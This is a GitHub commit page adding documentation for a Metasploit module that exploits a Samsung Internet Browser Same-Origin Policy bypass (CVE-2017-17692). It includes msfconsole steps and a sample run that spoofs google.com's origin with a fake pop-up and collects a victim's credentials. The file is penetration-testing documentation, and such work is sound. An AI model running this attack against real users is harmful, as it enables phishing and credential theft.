Skip to content

Commit 4aa480d

Browse files
author
Tod Beardsley
committed
Land rapid7#9311, docs for rapid7#9180
2 parents f0df175 + 95e2f1d commit 4aa480d

File tree

1 file changed

+56
-0
lines changed

1 file changed

+56
-0
lines changed
Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
## Description
2+
This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
3+
4+
## Vulnerable Application
5+
This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
6+
7+
## Verification Steps
8+
1. Start `msfconsole -q`
9+
2. `use auxiliary/gather/samsung_browser_sop_bypass`
10+
3. `set SRVHOST`
11+
4. `set SRVPORT`
12+
5. `set URIPATH`
13+
6. `set TARGET_URL`
14+
5. `run`
15+
16+
## Scenarios
17+
```
18+
$ sudo msfconsole -q
19+
msf > use auxiliary/gather/samsung_browser_sop_bypass
20+
msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104
21+
SRVHOST => 192.168.1.104
22+
msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090
23+
SRVPORT => 9090
24+
msf auxiliary(samsung_browser_sop_bypass) > set URIPATH /
25+
URIPATH => /
26+
msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.com/csi
27+
TARGET_URL => https://www.google.com/csi
28+
msf auxiliary(samsung_browser_sop_bypass) > run
29+
[*] Auxiliary module execution completed
30+
msf auxiliary(samsung_browser_sop_bypass) >
31+
[*] Using URL: http://192.168.1.104:9090/
32+
[*] Server started.
33+
[*] 192.168.1.101: Request 'GET /'
34+
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
35+
[*] 192.168.1.101: Request 'GET /favicon.ico'
36+
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
37+
[*] 192.168.1.101: Request 'GET /favicon.ico'
38+
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
39+
[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword
40+
41+
msf auxiliary(samsung_browser_sop_bypass) > creds
42+
Credentials
43+
===========
44+
45+
host origin service public private realm private_type
46+
---- ------ ------- ------ ------- ----- ------------
47+
emailID MyStrongPassword https://www.google.com/csi Password
48+
49+
msf auxiliary(samsung_browser_sop_bypass) >
50+
```
51+
52+
## Demos
53+
54+
Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
55+
56+
Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`

0 commit comments

Comments
 (0)